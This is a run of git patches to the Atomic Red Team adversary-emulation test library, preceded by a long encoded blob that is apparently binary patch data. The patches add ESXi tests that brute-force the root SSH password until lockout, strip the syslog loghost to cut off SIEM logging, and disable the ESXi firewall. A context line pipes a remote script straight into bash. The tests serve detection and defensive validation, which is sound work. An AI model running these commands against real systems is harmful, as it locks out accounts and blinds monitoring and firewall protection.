z6Zw;3$_jocb+k~*QY+@rY23s|2c4gbX@j2E=r`7yFO>e4kSj^pJlK$)^T2%gg8BVG zzs@&x`h@pAsk`+?#Vi5RbG@>A5kl$&zb3nZs{-qI`ok|2kyw~o51=-7Oy|ArT7b~cSC)%tzuJryC?<&S5#bJ;mh%<*Y) zyDKYrD=l@W=Au>VSyv>BspOTN}`^kFQKU}bt41d=7=O@3b zLAl#5J9&GxJngxGjUH^Z_jD{v2@50~IOz)83?^oiAKJiR31NqJ>p;>x+{O*ptwZq^mV|NP^ z7u&{q?g??U{4-MbS5PQI%y+1mb^f*MFIWlm%E0JmzodpM=6(OHpN+rZ)J3+9)wc6o zt;jD=iWxrLR@ma30j$=ONEMna!_@Dw)L!+0x|nrv1gz`LFPk}U^SI-}@bvCsJ6mH* zSFOfD=kt)y+<_ANC)Q?AmHtSfy*7^J9Ik80`l5q6`yxvqd-4n6K#hP)`zF|CLFa}& z>P4sJT`>dk@sTMs?b~2Kn?2dFI;ro#;4b*oMfv zjsfU(U#2NN$Pgmd{FN26NCOWISicmVBkQbtU9POwYgcBJ&)$JTGC+rD4tug`IJW`)1Ia%mF< zf5H6XxZ-3g@(S@%WS(_zRWs1A@BMoOHF8ezsJdzGx>LgHLwC*tGEYxj+)(h4Lv{SQ z2C#)vdMkUt$+d^r?<a*XmUw?^^5N0S9ryjKX!-<|ADC zhdrI`3OwEtCG@v}>F~_ZA~#HZ-*Qcf^p(};_JV%(sga2r6DYdNR?=&NRhnF3HONAv3<(!MD&tr@nD-dyYVa!-N86sX7krN}}gvZ~c3voe_4mwiTFY zo$UGxl*P>>bO{HFsXos8Eh%)F>|l6d3#oUJvh5f7x$5gm3O1Ua*+PBqJJFe^3 zx@EAGXJGuAC094s5h&gBmDfI~Nkv|7A`4R<2mTrXm-GBNR?&RLfH&0Hlz}FRPC7{o z|JSJSk?b!}H#IWVyzzP`{YksgpGxg^V zYcHj}X)cp=cHr)#{N_YKu4i@Jzd2EOXH3$cC;DMRLSsCUoqdqbF&RmLmh!-|Y+ z+m({GO6X9l8Ea!XPvdnkU&`(*AEHq_vg^U;xon#k3`UPFX7;}1(R|-TBM;3 z*Zz*%1Chv1)~9#L|50BP7Qt$d6J#DTL-?2Jx(qwf72|_O0`)J@DK0VOJ((x(3ShWt z_hxtP-@B_~L|hy@2QsM_gFM@E33&hUi=_Kq|1M>zVHFS$Z_s7Shc#(kl zo4Z;cTPPOju;ZH^)2wfdjT^j`%C6}9?DS80r!;}@kW;NH0jC2)@;{yAPVc*pRkA*@ za?fFG=bq@hj>OiF$x*4?R=p0`4}+N0WMvjztYB8WG>!w+Z@Gj_^;Kd;F#`2XctA?p zemaFIUpTU@X^bF?tlUG|W+9)-F8NI%*MD@9IObiaoB#3pzpc7W*_V{`iWRvYnB8^g z6@E(^k3aq(x;gyYaVbn&rH|wLs=)uLtg?%)?`3maK)T14p?J;T#T&9=4?F{-2XC)du1rDcH*KKR8uQr;Fl)*H zX%!eai#YK?zlMMON|}tPP^-n`O#`aatRM4%5BKPm_Hi&g&J48%0$z#C9fEmXDa!ee zler!YU!GJ{1G70+6SW3zitqbB8;|)qM&$n#M+GpV^`SS+l#XxtovvOJrhi#W&wmUZ zHerTkUt+`#f$*1GbB9Tvpz<+g7yi#v$7gqW^!`s@m2?oz z{XnHaFph$}Ym7_YO9F-<}7$i8J>U) zXZi2T{-5f7d$i(sC*I9va{TqV{>AGG=W&;YqNDbBx-OSoDPmbc4DBt1OGC}qTrDD{ z{W*2U;Yl6WujeAID2Ui}R9*@~-+|xSi+*jt^s9P8XjpJAD=Wrj&ywf&?BL?6EH)Z} zfh4xcLZTxy+^0gE^ki9zE@7DyGL=OF z@iph*o~Dx}&GkvCy&MF}@q$3P%ek)(>-?}Xr!uVehZdPE zfJo-^JQUsii4FMTt+du}^z(C>R@!|!wvE}wvT9jJT*2TBJE0-_l2R1D#M`Z=oSJ9w z*1wnk2_x(_3@bG43fuQE&JnpS5#edxKS3{~mHn_yBB&xS%E}jZY8D&>0iHb08>Gg? zMK*lGly}W~jvN}joH;#gPPXd$h(A4yFPbwK>IrW{+$`6x1K#zQ*_GJdWL7l1P9`Pu zW>35_lh9pu&zz=9r7;^;0~R1NlZ>Zf-n!d7SFC?Jd@I;%zxj%SzQM5V%WOR98!>}! z_*$`W-O2sW_Y?Jn6&@qGm0||hU_UxMIjQikTMJLI3Msg2@X)-S^v5;@aLHJ*c@`Ot@Z`)P%HL%PKCu!S?10p+Eqs)d!qm<}4PZh~tRsNA2X6%*vL+tJ z=ibw)KHvTOX<|bV_RrvUp`d3(S@=O-(Z^S}OS$o|bKk@(T4&yewXbF^{OjSO(8l$u zdNj|>gnYNU(G?Yh{AIg1`2R{LDhM!TTdDJQ3-s~CH}#6fnU{P7$v)qg>N&_cHb0Gu z#Is_L3-(|OuQY!=1b>c$tTcTD5fQO<5WC&b)3wB}Yp-n=AKo-4YwtFmaBEX|h2V58 zrIj5nWIViy#5>!-B6iQ$&&Rar@em0w5OOw0T6#PA`R3%F!Jo`nl7kv%p{v@wUNy1-I{TD&RiXOp;Re zU2S1GWs`PS3}m9GQ8YegWF>`~YO6&QQZLqh;6dW!X*SAYh*WdB0GUeur|XN92mx4* zFTGMZfTx!=00y4TUiKQ{30UO2miw;dfHKYo|34dq1#awg<{G5n>+{;(GUQ-X%jvbpKZMU_d$l*{g^Y-IIe&(K10ocM3MJ}XtC-VpmW+g$^z z#>;>-pd~@IT5vn!3yTzAP(!H)-tkX4oR5AC^K3+pO^wxdm8`xP4Uy3ucdGKucg|9C zky*!=9MWuT|5{eSG8e%28qOG()6e&PS>TjcAU!F3Zd>HqtMAXM;1~H~TI;{P@p5-f zxx%-&0%X?SoUkQSqu~(Im9PMarFl1RoW6xNsIty4&ZNg2=uScNs&2bPs`tr!WEo63 znC+OOHy(S71*Qt7O*UGoiE`_LD;x8NjSB=B1&5`HdPV5j5AtR7)ItA=_{K9M<&pJm zJLAy{ZezaE4yEhh@7v97kd^g?cUKDN{u7lAz5kb<4eeFnFRSt9s?Q9m$-Ic!t$7XI z@V8mt()PKY9HNVFIWu1L07Aq)->yc)Ci;aC%3ZHjaxlM^A z3NL=Dpr#O)nlIXE>{_ugtP;XpUW4zt)ZR}BF#BVGv z+{$C>A3U$#vrS%!qnK?s%@j2|iM~wtrv9sh_N@O;fL_IWQ7x4~9*f?`!n|QbEpjvm z-soPHy`+KVzlGLH?(##XHdt;9hiz z(u@MAmP6^(w;Hrv%aLkDF6Jm{p6|CntNCW!Do1=PriFj}}l3`d?2)*D)Qu zJ>X+)@uU#mkm>O{=*Ru!WfDFYQO@`l?c*&bUqg2^Uruf{<+K6b@ojj&!v;<8v+SGEIol#x)bG@DSheU9=r?G#Chgf(@P!GOi@fU7{s_GT zT<;d0ms|TW;9F(^?5FZo_=U*Sz`6=;I^$nLymHUbNyYQW9VE zVe|cz)GPMi<>3G=`{bnu)LUB-Dcn>eA%L8cr9#K^edw;$6-3euqsfZK58zf`FeBY2 zT#n2B#vI80RZtX+7Ab~>CGA@~L#w&`(?v31T6=bc+M-~V$Q1KbLN=}EneH13`xQ{q zB*;a6IVV&*5Vv}Y1~Oy)db+~Vzn$E|H0K||<$lhlqKZPg7sE}3kQiMy&9aggy`lwpbYV|+=R z?R&7{91^jg?0cmgJ-0jI8=LrRdzbKcZ0@D*SU=6#`GACSB@Pl|r+t<1c<})#GgdIy zG}z)3JBD;GBDP-AkT$U0=>?Hfy9@4z{6mDtng04j(+Ovn*sk`1h^gtD&*O$*lCP7X zo`7oP)3TFYv8J=}k!Ct~2=<+ot9oWsrc1#JJhw|dw=CJQlsrj1xZ}3ZMLdx1W1k11 zCY_&|qnlB)lewD_SrjTe+={hEzJcx=n+3UMq4RX&o_|JPf8FN8rlSWP7Vhq#TthTh zzC^a139r@bWpJDy%T zmmPzw4g`LUs&5q)_jMeWqv3b+PGXBbHLWKDzNgK%nRjf1JEuZpa`$-nHnWc_j;YL) z+&u-pO_=f|WAM5zp4+JnWK*2&SW1i257%{TgV_{w>D*&zBP|YLsRhvd7S#Z~9eg!U zFIW9JNI@SpExi{gDXB2Q{^@$x-&)8D*TGeka?)1;@|S`!dr0hB$#EVEFP2qW_9l7k zvcZj^L(s2~0&ylvY@78kx$TRGNokAsKcMuTe1p|m}hugA}bGu`D4?C zPBz5aRU=${-Z6HCn;)S2b(GrI8mZja-!=k({_4q3V8bq%g>vFvc&D;|Q`1&Qy954* za94b2oD-Qr3tukLIJH_aLfi`1J-j>(C>tviBGt!nozp`4{5rN!!ounch;?gh|BfN; z4vbJi4$BqIuBAkxTBLx=Cs6bDpX_p=mhaxrY{f}RNLd$InKb@oEW7<+3(TXg$LMZZ zreY8>pg!>k(vo$IjOcuswOeWET41M$$|o>+yC-*3C+tpggTMWOSmfrFSNJ9^u*h_B zUBOs9c!T^5EEMLo+PesW1C zeUP0)=lb)L($$h;+l$eSwcvv*jPk@uOwDGe&%+gjG4tA9DRk{D$^9{>4O*mg&QuUD zKP`!#lv*l2+@yzs&Fcth8`0DOH3xpiTj*5(Vj*BN#2X?_t=&87??FBQP8-i31s$k# zwk9GBK(p*~M|Tf=sd7Td7-%`t-B}jP71^H1(I4eM(O=@Eig6d3O;AdJpu=0d6FjEA z`QJ&H-0;FEDa|MPA1j_AM~OL&n>Vs+hx-GaI}&=-9E8(nTf8yl6BJHHR`hIts1Q^Q zC~P(O@)c%MNk0Lq#?&g!QJU;W_wlN))DqGKz|NJ4?fTiOV~fvvv(yUaG~B&x#K*n4 zXuVnL74t3jUiw8v$8!u>A!jdp?WPKDcT868bmEocUkS7}|DXNh&YoA%%9D`>B5Zq? zCLxB%9d!#e!M0rWy>j0nGM3qeQjnQb#)dZzb4rNwzcW zI51p&6Jr)z5leg@D7yZ~6WQkXsd<{w#?R0SxsQy-emaM_0UsuR=ApP8!1oH@UI`} zyM?os$G#4k;9-kG)j69C--x0jCo;KNB%vGNp|eRFz1R=w+r#^73xJg-$t}zWG=ts) z-5TV{|6H9~Ac~MLu#j?(5RX*)H+RgK*}sT_xriS-+Hq1a@wC=ghN}{8TILiXVy6DA3%qLE-niEJ5|&6c|~yRlh|JG$nvIiuz2% zJ#xOT@(B=qH9cpuLj#rb!vxpo_~5t7M?id!E5-4_B6zSM2q^3m2 zNG}(eQ$5z+Z{ntt>sDNQFFLLYdU@r;G5|Qd1~^D{&oK7eyB*9fVo%xn(lO{2WD|bwFk2I zC%AT!Q$ff#mQyuuF4WyC#bTk~xW`T4miGmMO5%65F+PCTyLk;?x}0-tBChv?K!g|F z!RxF4Xum$@c|TrFUIgIAOPlU_vf7jQL9K=d;CN8$KY8>}e6ZgeQZZZ<$~h%*gCLbI^mZ+3$ia3{7&l3_?G&7Cxu` zqZk=FAaMR(b$0YCU8H-0vqL3)@}78ptEqo0b4C4n?lwQ)H!Wr)<~cUwbn6PAP-PCt ziUD@oahESJ$YOPC)M#92dU+xb15&KuSY5ME11bN?HRtawO8~p-IPGnTW4_#eU~F0! z0kU@wx`t&qewtW5b`eK<=lejME;JMFIlon!=r6;lUv-Szr0tCm;DR!0T|&s^XZ`tX z<7~;85W&1F<8RLk_;w_qU4@%!#T}ddb18WbERnN{L0sCG53iDP&^<@u;2*dL)gWcc8@r>Wno9g?;w+JgynZTNzbqzh9|@vG)2sFg+4=af3LsHOrHaBc55ra zoyF?kKntCmP7YY3h_q9xCUR?khxI#n8HVk>*ONr!tiC8>@wv~YYEx_!BwzRyCKmyN}w^ocW2p z`^pZ8wU&O0LdoEMrf}c>C2)73o4&>T#8ZMPckWTSAN2I~rBCH2t&L37(&J(DyYDD1Lg^YC-$w&otTgg|xGx+Cwd8yx~% z&DStz$vr|Jcjc3pDv(n+az7O&0(`OpQuDju#;gNSM|#gDO;B_&B(XYKKw`)k^8`Rj zEkN!Yp|rO@se=-m4(y}A=cfLQKq9}|bBzikR6>@cic;p5Cgeb*alCR(bT40$H^qY? z3I7p#ySBvH_vA4CURU1SaBY8Hi#7Mj_P}0M-pe~VuHPHoUBD4!s6nYPta(}amd@WYFzmg5NwqHI@2)!Bb zzW7bjJzy{QU}O3Rtr;r!2(rgBSM^tIx~BTrag5AF(!S&_)1|}NbRMNsCQPX(*LFn} z6OydfLs|Ft;0I0ORXYAofT46@jvQp(JED|F9j5YpZ++QA2Jb+1TyJVije(?Tuu0W@ z;jf`>m_Te_%gT)#XEf!l>&WhO#O>7?-KcM=xfU_ zgnC;hV7RkcJYmL``D_(wU7)7pm6j_OF=4+>MnxK)OS(NBQ6NICP-!X?}3&`UGwu7^qn=ZX7VC+zFZHAMZH zXoCGGWt!Iq5Uc6m0|kB&1EEm*cUrxIR#zi|cpj_?Z6?&sXA7SZGD`9@>)yBG0Kd+7 z1Tmn{^uy$}smkDfB8k_(uQo+vQ8&TPEUq#sx=M-_IXzLqO)zKyB#uRn))r_i-rm7W z`uChnjJ2A8&B*)pOr*B1N!4}cCH3|f9IB(3GlVNDyXwutV>fyOkn_5AY#I2eNg0V`6F&yco^b$X%9by$aT)~1)Tkwm%o_bOV`Zu&CDOqABG5wgc!=dJgc1C%RDrc zclyw9fO0=H3!fjaqP{y3uSG1?v?B-vTbWW?Hxbx*6%pgYCn;Ny@!R@ zg3{x%)WFL8_amyLZToi?KZbH`jbFLt+2v9be^_o?)uBn?T;+vy`SjiV*qpN-a$+*> zi5h#8n9sj-v)T%*1NQ1s$71{w70*UVhYyg(XPkjT#FGsn4scsH%IjAQZBXb1zov&G z^@2)OcWZ1KlIG*X*!P^(<7aL=d($Ip!?B#$troNh(c=a7rTO8xo)-Mw)DLdK*xyV0 z{Fm}_nIbXBew?pGL!-?yJXCkfozL4H`dtTiruzvz3CjW7Lga(Bje}H)!H=0EHr%@^ za;-%+#o~?lNud`P0_u~z6oe6<*J`kru`2+!`;s9lfkB1TNZCJOO0Cg0UxhY(ogiHr z6w}G+!~;$XrYvU>!W@hm)EEI-8F?R%xb z-PlCUuFJz07B~OLG=gS@Qun4V$XKCX{OUn){bZG#{>Tw-!CLElm7Q^oxV+N4-@XKu zQ5hwviKbqD6;ArY;2O_Ox4MoBj(iB`hx@u2HH1Zx<|F-|l=kLq`ldqH!xIcFoknFD z4?&J{wn~x{2V3THti9Eu3{AH?$N$1{d2blHL=WR($mBE{2*c))sf)PrQ-Qxv2%=vP z!b>_l4+UM|pm-DKZ;@ScYO`}kkN4T#C}M|{Z&MJhULX^YtN!6QA)gwXu(^$6ji6gI z>s4TnVg$=NuicA^uzZ^59{cAXYJ7-swGv+DqSbNCiRY-Gct+q~JXnwtM{}K+T6XJ9RYfP&oRH3K8xS6`=fD|HPmPa?i+ez{M0!KzNuMbRl=J;% zzQv--vdPyAAR?b5wzva_q-mjm+p`IUhc_@sBxBuI4sH(bb#zD^M00F8XEF1gO@OL@ z&Z?E0CpK$CL8`bwNlJMHjlN){>)!StomIZY``bv@_iVD5!@oLGq_j;zPyG08;*iEo zFz2}Wh!r9i8@hUsF5p|TqDWLmsPK|?*B|w#J(;JK~!4v)Y;L$VbhM*e00vz@w z-`UKo_7P^UWnZ6PS8(8AOy)yoZp|Q*sc!<$+rBTo48KSDJm_s{woOqP2<{yUAT<*~i;KZOg33^@nE7 zH2Buj+B@yYuw`5Bmt^(Z)mCc2O#4OZ?Vo$TTegyKcbKJJ(_({rU_smEw>y~0pMnDS z$31Vc&uNr>x$Sb6Admo1!@hJmqs-NdThuD6ZA=S0z12MC@hZ|4Qxy2oZY;M~AAS;| zTUPS^gjO?B+0GNIcaMsIlq|UXeZ7_!xZvuix}O}Vl$WPeu$^}DZH4e_YtUX%GF5}(HY;N5f1PE@C zmr8ARbBX2Xz&y8L_v0`F>g48(9ZE&P7$*3V(-j!KBy(#}a0DXKYQ1p5^HoeFaIC?t zwu^i_O3Xv0TG|bXKG|P-#?DZzfN|?m*qKd7$(n(`4K_0lSkA#(5BY6nV%3W%qmt`Y zc)gc8YYbR`Z82%7A789*m;C&Ybjkg$z~(yIRL(rUzD-ek9YHSZv)e>HsW6Hx41N

- -Open Source Security Index - Fastest Growing Open Source Security Projects - -

+

# Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1514-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1515-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From 11400be95136a1170b196da81249618deeed38fa Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 17:44:08 +0000 Subject: [PATCH 07/41] updating atomics count in README.md [ci skip] From eba0f8ea6165e1a62c4cd40a0785785171a9a08f Mon Sep 17 00:00:00 2001 From: adelfavero57 <78580239+adelfavero57@users.noreply.github.com> Date: Fri, 23 Feb 2024 06:48:23 +1100 Subject: [PATCH 08/41] Esxi atomic tests batch 2 (#2650) * initial esxi commit * second commit esxi * use ExternalPayloads folder * use ExternalPayloads folder --------- Co-authored-by: clr2of8 --- atomics/T1110.001/T1110.001.md | 46 +++++++++++ atomics/T1110.001/T1110.001.yaml | 38 ++++++++- atomics/T1560.001/T1560.001.md | 80 +++++++++++++++++++ atomics/T1560.001/T1560.001.yaml | 68 ++++++++++++++++ atomics/T1560.001/src/esxi_get_loghost.txt | 1 + atomics/T1560.001/src/esxi_remove_loghost.txt | 1 + atomics/T1562.004/T1562.004.md | 49 ++++++++++++ atomics/T1562.004/T1562.004.yaml | 39 +++++++++ .../T1562.004/src/esxi_disable_firewall.txt | 1 + .../T1562.004/src/esxi_enable_firewall.txt | 1 + 10 files changed, 323 insertions(+), 1 deletion(-) create mode 100644 atomics/T1560.001/src/esxi_get_loghost.txt create mode 100644 atomics/T1560.001/src/esxi_remove_loghost.txt create mode 100644 atomics/T1562.004/src/esxi_disable_firewall.txt create mode 100644 atomics/T1562.004/src/esxi_enable_firewall.txt diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 672281b661..2f047046ec 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -40,6 +40,7 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd) +- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi-brute-force-until-account-lockout)
@@ -431,3 +432,48 @@ pkg update && pkg install -y sudo curl bash
+
+ +## Atomic Test #8 - ESXi - Brute Force Until Account Lockout +An adversary may attempt to brute force the password of privilleged account for privilege escalation. +In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f0b443ae-9565-11ee-b9d1-0242ac120002 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vm_host | Name or IP of the ESXI host | string | atomic.local | +| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1110.001\bin\plink.exe' | +| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5 | + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } +``` + +#### Dependencies: Run with `powershell`! +##### Description: Check if plink is available. +##### Check Prereq Commands: +```powershell +if (Test-Path "#{plink_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +``` + +
\ No newline at end of file diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 80a84566aa..0ee6159345 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -263,4 +263,40 @@ atomic_tests: curl -s #{remote_url} |bash cleanup_command: | rmuser -y art - +- name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: f0b443ae-9565-11ee-b9d1-0242ac120002 + description: | + An adversary may attempt to brute force the password of privilleged account for privilege escalation. + In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' + lockout_threshold: + description: Specify the account lockout threshold configured on the ESXI management server + type: string + default: "5" + dependency_executor_name: powershell + dependencies: + - description: | + The plink executable must be found in the ExternalPayloads folder. + prereq_command: | + if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } + name: powershell + elevation_required: false \ No newline at end of file diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 365a35ba1d..67ad62df49 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -28,6 +28,7 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64) +- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi-remove-syslog-remote-ip)
@@ -502,3 +503,82 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
+
+ +## Atomic Test #10 - ESXi - Remove Syslog remote IP + An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8241dda4-962e-11ee-b9d1-0242ac120002 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vm_host | Name or IP of the ESXI host | string | atomic.local | +| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1560.001\bin\plink.exe' | +| username | Username used to log into ESXi | string | root | +| password | Password used to log into ESXI | string | n/a | + +#### Attack Commands: Run with `powershell`! + + +```powershell + # Extract line with IP address from the syslog configuration output + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt + + # Replace the IP with "0" + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt + + # Extract the IP from the line extracted from findstr + $inputFilePath = "c:\temp\loghost.txt" + $outputFilePath = "c:\temp\loghost_ip.txt" + + $fileContent = Get-Content -Path $inputFilePath -Raw + + if ([string]::IsNullOrWhiteSpace($fileContent)) { + Write-Host "The content is $fileContent" + Write-Host "The file is empty" + } else { + # Use a regular expression to extract IP addresses + $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value + + $output = "esxcli system syslog config set --loghost=" + $ipAddresses + + $output | Out-File -FilePath $outputFilePath -Encoding ascii + + Write-Host "IP addresses extracted and saved to $outputFilePath" +} +``` + +#### Cleanup Commands: +```powershell + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Check if plink is available. +##### Check Prereq Commands: +```powershell +if (Test-Path "#{plink_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +``` + + + + +
\ No newline at end of file diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 348d3b6ddd..2104fbdd1b 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -315,5 +315,73 @@ atomic_tests: cleanup_command: 'rm -rf #{input_folder}' name: bash elevation_required: false +- name: ESXi - Remove Syslog remote IP + auto_generated_guid: 8241dda4-962e-11ee-b9d1-0242ac120002 + description: | + An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' + username: + description: Username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: | + The plink executable must be found in the ExternalPayloads folder. + prereq_command: | + if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + # Extract line with IP address from the syslog configuration output + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt + + # Replace the IP with "0" + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt + + # Extract the IP from the line extracted from findstr + $inputFilePath = "c:\temp\loghost.txt" + $outputFilePath = "c:\temp\loghost_ip.txt" + + $fileContent = Get-Content -Path $inputFilePath -Raw + + if ([string]::IsNullOrWhiteSpace($fileContent)) { + Write-Host "The content is $fileContent" + Write-Host "The file is empty" + } else { + # Use a regular expression to extract IP addresses + $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value + + $output = "esxcli system syslog config set --loghost=" + $ipAddresses + + $output | Out-File -FilePath $outputFilePath -Encoding ascii + + Write-Host "IP addresses extracted and saved to $outputFilePath" + } + + cleanup_command: | + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt + name: powershell + elevation_required: true \ No newline at end of file diff --git a/atomics/T1560.001/src/esxi_get_loghost.txt b/atomics/T1560.001/src/esxi_get_loghost.txt new file mode 100644 index 0000000000..217d1884c0 --- /dev/null +++ b/atomics/T1560.001/src/esxi_get_loghost.txt @@ -0,0 +1 @@ +esxcli system syslog config get \ No newline at end of file diff --git a/atomics/T1560.001/src/esxi_remove_loghost.txt b/atomics/T1560.001/src/esxi_remove_loghost.txt new file mode 100644 index 0000000000..5ab74451d4 --- /dev/null +++ b/atomics/T1560.001/src/esxi_remove_loghost.txt @@ -0,0 +1 @@ +esxcli system syslog config set --loghost=0 diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index 7b148c4874..8196b11c2c 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -50,6 +50,7 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall) +- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi-disable-firewall-via-esxcli)
@@ -968,3 +969,51 @@ netsh firewall set opmode mode=enable >nul 2>&1
+
+ +## Atomic Test #23 - ESXi - Disable Firewall via Esxcli + Adversaries may disable the ESXI firewall via ESXCLI + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8710d396-96e5-11ee-b9d1-0242ac120002 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vm_host | Name or IP of the ESXI host | string | atomic.local | +| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1562.004\bin\plink.exe' | +| username | Username used to log into ESXi | string | root | +| password | Password used to log into ESXI | string | n/a | + +#### Attack Commands: Run with `powershell`! + + +```cmd + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt +``` + +#### Cleanup Commands: 